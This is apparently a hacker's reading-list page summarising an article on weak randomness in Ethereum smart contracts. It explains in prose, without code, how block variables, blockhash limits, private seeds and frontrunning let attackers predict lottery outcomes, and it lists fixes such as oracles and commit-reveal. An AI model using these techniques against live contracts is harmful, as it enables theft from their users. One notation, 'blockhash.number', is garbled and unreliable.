Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Randomness on the blockchain is a known problem. Regardless, people are still trying to make random functions for themselves, only to fail. This article dives into HOW this is done.

Many of them try to use block variables in order to provide randomness. block.coinbase is the miner of the block, block.number is the height of the current block and so on. An attacker can manipulate these if they have enough resources.

Or, even worse, they could write a smart contract that executes code within the same block used in the PRNG contract. Then, they have all of this information and have completely broken the randomness. The author shows examples using SHA3 of timestamp, block.number and a combination of many others.

blockhash is the verification hash of the block being mined. Why is this bad? blockhash.number will always yield 0, since the data is not known until after execution. blockhash.number - 1. For this one, an attacker can execute code within the same block of the smart contract.

Wait, there is more! block.blockhash() seems great. However, Ethereum only keeps track of the most recent 256 block hashes. After this, 0 is return. As a result, the random number could be predicted, if the new code was executed 256 blocks later. This happened within a SmartBillions lottery.

Want to use private modifier for a seed? That will not work either! Although this is private to the smart contracts, it is trivial to get this information off-chain then make the transaction with this information inside of it.

In Ethereum, the miners choose transactions to create a new block based upon the gas used by the transaction. Hence, the ordering can be manipulated by adding more gas to transaction that you wrote. This can be abused when the execution flow depends on its position in a block; the attack is called Frontrunning.

The article has a great example of this being abused. A lottery could use an external oracle to get a random number. An attacker could observe the pool of pending transactions and wait for the oracle to put data in. The attacker could see this random data, use it to break the randomness and put their data in with a higher gas price to go sooner.

How to fix this problem? Oraclize is a service for distributed applications to go between the blockchain and internet. Here, the random data could be grabbed, then used for verification of previously gathered data. A few other math-y ways were mentioned as well, such as signidice and a commit-reveal approach.